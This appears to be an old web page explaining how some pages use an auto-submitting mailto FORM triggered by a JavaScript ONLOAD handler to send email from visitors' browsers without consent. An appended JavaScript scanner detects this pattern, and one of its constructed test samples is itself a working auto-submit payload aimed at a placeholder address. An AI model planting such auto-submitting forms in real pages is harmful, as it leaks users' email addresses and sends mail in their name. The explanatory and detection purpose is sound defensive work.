The problem

It's possible for web pages to cause your browser to send email to third parties without your consent. This is troublesome for at least two reasons:

  1. If your browser knows your true email address, you've just given it out to a stranger.
  2. You are sending email to strangers, and you don't know the contents of the email. If the recipients find the email objectionable, they may complain to you, leading to confusion.

How it works

The email sniffer recorded here uses a FORM in the HTML document, with an ACTION that sends mail (including the FORM's INPUT elements) to whatever address is configured into the web page. Rather than waiting on the chance that the user clicks the form's submit button, the web page also defines a JavaScript "ONLOAD" handler that submits the form on the user's behalf.

The consequence: users with JavaScript enabled will automatically send mail to the address configured in the form when they load the tainted web page. A nasty use of JavaScript.

I've recorded one web page which does this. I advise turning JavaScript off before following these links. I've recorded their top-level web page and the separate JavaScript file it references. The original pages try to obscure the meaning of the JavaScript, so I've also pared down the main page and edited the JavaScript file, to make the code clearer.
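
A defender-side check for the pattern described above, as an added example that is not part of the original page: it flags HTML that pairs a FORM whose ACTION is a `mailto:` URL (assumed here to be the mail-sending ACTION the page refers to) with script that calls `submit()` without a click, and marks pages for manual review when the handler may live in a separate script file. The function names, sample pages and the `example.invalid` address are constructed for illustration.

```javascript
// Heuristic triage scanner (regex-based, not a full HTML parser).
// Return the value of attribute `name` from one tag's source text, or null.
function attr(tag, name) {
  const re = new RegExp('\\s' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Recipients of every FORM whose ACTION is a mailto: URL.
function findMailRecipients(html) {
  const out = [];
  for (const m of html.matchAll(/<form\b[^>]*>/gi)) {
    const action = (attr(m[0], 'action') || '').trim();
    if (/^mailto:/i.test(action)) out.push(action.slice(7).split('?')[0]);
  }
  return out;
}

// Script text that runs without a click: ONLOAD attributes and inline <script> bodies.
function autoRunCode(html) {
  const chunks = [];
  for (const m of html.matchAll(/<(?:body|frameset|img|iframe)\b[^>]*>/gi)) {
    const handler = attr(m[0], 'onload');
    if (handler) chunks.push(handler);
  }
  for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) chunks.push(m[1]);
  return chunks.join('\n');
}

function scan(html) {
  const recipients = findMailRecipients(html);
  const autoSubmit = /\.submit\s*\(/i.test(autoRunCode(html));
  const externalScripts = [...html.matchAll(/<script\b[^>]*>/gi)]
    .map(m => attr(m[0], 'src')).filter(Boolean);
  let verdict = 'clean';
  if (recipients.length && autoSubmit) verdict = 'auto-mail';
  else if (recipients.length && externalScripts.length) verdict = 'review-external-script';
  else if (recipients.length) verdict = 'mail-form';
  return { verdict, recipients, externalScripts };
}

// Constructed sample pages (not the pages recorded by the author).
const SAMPLE_INLINE = `<HTML><BODY ONLOAD="document.forms[0].submit()">
<FORM METHOD="post" ACTION="mailto:collector@example.invalid">
<INPUT TYPE="hidden" NAME="seen" VALUE="1"></FORM></BODY></HTML>`;
const SAMPLE_EXTERNAL = `<html><head><script src="menu.js"></script></head>
<body onload="init()"><form action="mailto:collector@example.invalid"></form></body></html>`;
const SAMPLE_BENIGN = `<html><body><form action="/search"><input name="q"></form></body></html>`;

for (const page of [SAMPLE_INLINE, SAMPLE_EXTERNAL, SAMPLE_BENIGN]) console.log(scan(page));
```

A `review-external-script` verdict means the referenced script file has to be fetched and scanned as well, since the submit call can be hidden there.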